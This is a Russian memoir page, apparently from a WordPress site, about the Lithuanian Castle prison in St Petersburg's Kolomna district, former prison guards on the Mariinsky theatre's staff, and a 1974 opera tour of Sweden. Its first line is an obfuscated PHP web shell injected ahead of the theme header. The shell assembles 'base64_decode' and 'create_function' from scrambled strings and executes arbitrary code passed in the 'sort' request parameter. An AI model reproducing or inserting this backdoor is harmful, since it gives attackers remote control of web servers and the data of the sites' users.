nnn$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();nnn?php /** * @package dazzling */ ?>

“ПОЭТИЧЕСКОЕ НАСЛАЖДЕНИЕ”


                                                           
                                               эпиграф

ЕСТЬ  КАКОЕ-ТО  ПОЭТИЧЕСКОЕ  НАСЛАЖДЕНИЕ  В ТОМ,
ЧТОБЫ  ВОЗВРАТИТЬСЯ  ВОЛЬНЫМ  В  ПОКИНУТУЮ
ТЮРЬМУ.
                                        А.С.  П У Ш К И Н
                                                           

6)  ПРИМЕЧАНИЕ  к  К О Л О М Н Е   как  т а к о в о й . . .
    . . .  (!)  Мариинский  театр, Никольский  собор, Консерватория , Новая  Голландия  –  это  всё  та же  Коломна. Ведь  можно  проложить  и такой "культурный"  "маршрут  Поприщина"  Но мало  кто,  почти  уже  н и к т о  не  знает, что  рядом  с  этими  прекрасными  культурными  и  духовными  исполинами  был  до 1930 года и  уравновешивающий  их   криминальный ,  можно  сказать, МЕТАфизический   исполин,  очередное  "государство  в  государстве"  покруче  коломенских  "квадратов" и  "пряжек".  Итак,  опять  я  в  жанре  " истории,  пропущенной  через  себя ".
 
                             Я  уже  это говорила,  что,  проработав  сезон  в  драматическом ( Александринском) театре  и  "загуляв"  с  моим  будущим  мужем,  я  поняла,  что   он, будущий  оГеоргий,  и  есть  "МОИ  УНИВЕРСИТЕТЫ". Точно  так  же  я  решила  про  неудавшееся  на  горе  родителям  моё  обучение  ради  карьеры,  что ТЕАТР  – это   у ж е   ШКОЛА  ЖИЗНИ. Поэтому ровно  как  и  год  тому  назад  я  пошла  в  проходную следующего  на  моём  пути  театра  и  ровно  так  же,  по телефону,  вызвала начальника  бутафорского  цеха Кировского (Мариинского)  театра. Он незамедлительно спустился  " с  высот  небесных  рая",  схватил  меня  в охапку  и  уволок  к  своим  переругавшимся  старухам  в  мрачный  бутафорский  ц е х.  Я  поняла,  что  призвана  к  невыполнимой  миссии  миротворчества.
   И  вот,  через  год-два,  я  в  очередной  раз  рыдала,  заглушаемая  ревущим  в  двадцати  метрах  от  меня  симфоническим  оркестром. Проклиная  всё  что  ни  на есть  на  свете,  а  следовательно  –  и  в  театре, я  забралась  в  театральную  конструкцию  от  другого  спектакля,  но  тут-то  на  меня  и  наткнулся  один  из  рабочих  сцены. Узнав,  что  причина  моего  экстаза  заключена  в  "свинцовых  мерзостях  российской  действительности",  то  есть  в  намерении  уволиться  из  театра,  он  очень  "исторически"  грамотно  меня  утешил:
            — Да   ты   что,  не  знаешь  что  ли,  что  тут, в  театре, в с е,  н у,  в с е   наши   начальники   сцены:  от   н а ч п о с т а  ( постановочной  части )  до  т в о е г о  –  это    " в о л о г о д с к и й   к о н в о й ", выходцы  из  раньше  бывшего  рядом  " Литовского замка " ?
       Естественно,  если  кто  заранее не  знает, про  что  речь, то  эти  слова  воспринимутся  как-то  странновато. Вот  мне  парень  и  объяснил  эту " тайну  века". А   я  вам  его  слова  расширю  из  Интернета.
       В прежние  времена  переулок,  где   ныне  театральные  мастерские,  назывался  не  Матвеев,  а ТЮРЕМНЫЙ.
       По  всей  набережной  Крюкова , а  ещё  древнее – Никольского  канала  был  построен  тюремный Замок. По проекту  Старова.
       В  плане,  то  есть   сверху,  замок   выглядел   п я т и у г о л ь н  и к о м  ! …………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
…ну  не  юмор  ли, что  на  его  месте  в 1930 году был  построен, а  ныне снесён  под  Новую  сцену Мариинки  Дворец  Культуры  Первой  ПЯТИ-ЛЕТКИ !
   То   есть   как  бы  переход   из    у с л о в н о й   " пятёрки "   п р о с т р а н с т в а    в    условную  " п я т ё р к у "
   в р е м е н и  . . .
………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….
   … Замок  был  достроен  к  1887 году. Поначалу  он  назывался  СЕМИБАШЕННЫЙ.  Его  церковь   была   освящена  в  1828 году.
       Назывался  замок  в  народе  Л И Т О В С К И М , потому  что  к  1800 году  в  одном  из  его  зданий  расположился   Л и т о в с к и й   мушкетёрский  полк.
       Писатель  Крестовский:  "… сбоку  от  ворот,  обращённых  к  Литовскому  мосту  –  образ  Спасителя  в  темнице  и  в   узах,  а  над  воротами  –  чёрная  доска  с  надписью  "ТЮРЕМНЫЙ  ЗАМОК ". . .  Медная    фигура    а н г е л а   была  овеяна  легендами:  многие  заключённые   с л ы ш а л и,  как  по  ночам   о н   обходит  тюрьму,  иногда  стучась  в  камеру  кого-либо  из  смертников.  И  того  в  ту  же  ночь  казнили . . .
        Вот  уж  " ужасы  нашего  городка ",  т. е.  Коломны !
        Расскажем  про эти  ужасы дальше.
        В  революцию  1917 года  Замок  пытались  сжечь. Однако  понятно, что  каменные  бастилии  и  берлинские  стены  не  горят,  как , к  слову,  и  рукописи. Но  они,  понятно,   р а з б и р а е м ы . И  к  1930  году  Литовский  замок,  успевший  послужить  не  только  царской,  но  и  советской  власти, по  камушку  разобрали, застроив  освободившееся  "нехорошее  место"  сталинскими  домами  с  упомянутым  Дворцом  Культуры, который  по  культурно-просветительской   работе  успешно  конкурировал  с  соседним  театром.
         Костяк  молодых  сотрудников  упразднённого тюремного заведения, названный  мне  как  "вологодский  конвой", трудоустроился  в  постановочную  часть  и, само  собой,  в  партийное   р у к о в о д с т в о  Кировского…  э,  нет  – Мариинского  театра  -он  был  переименован  в  1936 году.  Думаю,  что  и  для  построенного  рядом  Дворца  Культуры  имени Первой  Пятилетки  тоже досталось  контингента  из  этого Замка.  В  те, довоенные,  времена  эти сотрудники  театра  были  молодыми  орлами,  а  к  моему  явлению  в   их  обитель  зла  они  были уже  пенсионного  возраста. Но  они  были  настолько  въевшимися  в  плоть  и  кровь  театра, всласть  с  ним  наездившимися  по  всему  миру,  что  с  ужасным  скрипом  эти  монстры  " сходили  с арены ",  с  политической  сцены  театра.
     Вот   тебе,  бабушка,  и  Юрьев  день !  " Вологодский  конвой " ! То-то  я  чувствовала  к  себе  какое-то  от  них  отеческое  расположение: ведь  мой  папа "кондово" вологодский,  со  всеми  типическими  издержками.
   Это  откровение  рабочего  сцены  нельзя  сказать,  что  сильно утешило  меня. Утешило  только  в  плане  его  ангельского  снисхождения  ко  мне: парень  тоже  был  "наездившийся"  по  миру  и  с  европейским  запанибратством, что  меня  к  этому  театру  интуитивно  и притянуло  в  те  страшные  годы  смертельной  боязни  друг  друга.
    " Ладно – сказала  я  ему  и  себе,-  ещё  маленько  потерплю  этот  геноцид ".  И  дотерпела,  что  тоже  стала  "выездной" . . .
     Но  обязательно  надо  здесь  добавить  ещё  одну  информацию,  вытянутую  из  благословенного  Интернета.  Обожаемая  петербуржцами  Новая  Голландия,  оказывается,  имела  в своих  чреслах …т ю р ь м у,  офицерскую  тюрьму! За  архитектурный  вид  её в  народе  прозвали  БУТЫЛКОЙ !
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

 СЛУШАЙТЕ !  А  ВЕДЬ  ВЫРАЖЕНИЕ  "ЛЕЗТЬ  В  БУТЫЛКУ",  "НЕ  ЛЕЗЬ  В  БУТЫЛКУ ! " –  не  отсюда  ли  пошло ?  В  Интернете  даётся  только  банальное  дидактическое  пояснение  этого  выражения.  А  ведь ,  похоже, что  моя  догадка  абсолютно  верна !  и  не  вызывайте  меня  на  дуэль ( что  в  те  времена  было  подсудно ), не "лезтьте  в  бутылку",  меня  оспаривая . . .( это  я  для  примера  употребления  этой  БУТЫЛКИ ( чуть  не  написала – БУТЫРКИ ). . .
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

7)  ПРИМЕЧАНИЕ  к  факту  отсутствия  в  европейском  лексиконе  слова "ЮРОДИВЫЙ"  и  которое  было в  рецензии  на "Бориса  Годунова"  обозначено  словом          "ИДИОТ ".
        До  сих  пор  только  ленивый  не  посмеялся  над  случайной  репликой  из  ток-шоу  девяностых  годов  " у  нас  секса  нет! "  Умора, потому  что  всё  познаётся   в  сравнении ! Как  там  в  нашей "энциклопедии  русской  жизни" : "… но  наше  северное  лето  –  карикатура  южных  зим.."   То  есть   н а ш а  отечественная   и  западноевропейская  революции ( в  сексуальном  смысле)  –  в  такой  же   пропорции,  как  лето  " здесь "   и   лето  " там ".
           С  этого  места  поподробнее ?
           Итак, не жданно  ни  гадано  стала  я  "выездной".
      А  попали  мы  с оперными  гастролями  в  самый  р а з г а р  "СЕКСУАЛЬНОЙ  РЕВОЛЮЦИИ" !  Да-да,  Швеция  1974 год –  кульминация. Кошмар!  Было от  чего  настроению подниматься  и  без  газетных  лексических  нюансов  "юродивый – идиот".
     Мужики  ходили, как  говорится,  словно  пыльным  мешком  по  голове  огретые, а  мы, тётки, элегантно  недоумевали.
     Поскольку  всем  предписывался  канон  ходить  по  улицам   т о л ь к о   сплочёнными  тройками,  то  некоторые  "революционные  тройки"  вдруг  исчезали  в  соответствующих  – революционных –  магазинах. Но  поскольку   моя  " тройка "  была   смешанной: два   бутафора  и   я ,  бутафорша  –  то   мне  с  ними  за  компанию  приходилось  входить   в   эти   анналы  морального  распада.  А   там  я  была  ими,  в  лучших  мужских  традициях,  бросаема  на  произвол  судьбы  –  оба  моих  старших  товарища  вдруг  куда-то  исчезали.
        И   в  этом магазине  я  вынуждена  была  найти  компромисс: чтоб  и  волки (мои  начальники ) были  сыты,  и  овцы (то  есть  я ) была  вне  подозрений. Прятаться, ясное  дело, было  глупо  и  некуда.  Оставалось  только стоять  перед  оконной  витриной. " Картина  маслом "  была  такова, что  я  стояла  в  позе  отчаявшегося   Наполеона,  лицом  к  улице  и  получалось –  поверх  рекламируемых  в  этой  витрине н е о р д и н а р н ы х  товаров. Наши " тройки ", проходящие  мимо, понимающе улыбались, помахивая  мне  ладошкой  и  грозя  пальчиком. . .  Но,  спаси  Господи,  я  не  осталась  перед  коллегами  в   долгу  за  это  своё  позорище.
        На  моё  счастье, по  непопулярной  у  нас  дороге  к  театру ( ибо  там  не  было  магазинов )  всё-таки  магазинчик  нашёлся  – ц е р к о в н ы й , то   есть  однозначно   з а п р е т н ы й !  Я  хитростью  заманила  туда  коллег, а  вслед  потянулись  и  сзади  идущие " тройки ":  мол,  какой-такой, ещё  не  изведанный  магазин  они, то  есть  мы,  там  раскопали ?
      А    т а м   очень  милый  молодой  человек  сразу  во  мне  учуял   " с в о ю "   клиентку,  вынес  кучу  толстенных  книг   типа  " Столп  и  утверждение  истины ".
     Я   дико  отмахивалась  от  него  и  его  предложений  с  ещё  большим   ужасом,  чем   в    с е к с ш о п е  ( нынешним  людям  не  понять  советской  табуированности  обеих  этих  тем). Я  всё  же  на  пальцах  ему  объяснила,  что  мне  нужно  совсем   н е м н о г о   ладана. Он  вынес  мне  коробки  типа  сахарорафинадных. Я  взяла  одну,  килограммовую,  почти  бесплатно.  Ничего  себе !  Это  что  –  торговля ?  Когда  продавец  хочет  всё    " за  так "   отдать,  весь  свой магазин  первому  встречному  покунателю !?. . .
      Я   озадачилась ,   н о  . . . !  Неприятности  и  мелкие  " кармические  пакости "  опережали   друг   друга.
      Если  б  я  подумала, наперёд, тайно  от  коллег  засовывая  криминальную  бумажную  коробку  в  сумку ! Всё тайное  становится  явным ! Бывает,  сразу  же.
     От  ладана,  который  я,  маскируя,  перепрятывала  и  как  на  грех   р а с с ы п а л а,  сразу  провонялись  раздевалка  в  театре,  номер  в  отеле,  потом  холл   в  аэропорту,  где   мы  несколько  часов  ждали  отлёта;  лично  про  себя,  благоуханную,  уж   и  не  говорю …
     Но  я  уже  точно  к  концу  гастролей  решила,  что  уйду  из  театра.
                        +
              петр иоанн  андрей
филипп  фома  варфоломей
               два иакова  матфей
  иуда яковль ,т.е.ф а д д е й
   зилота симон  и  матфИй


Добавить комментарий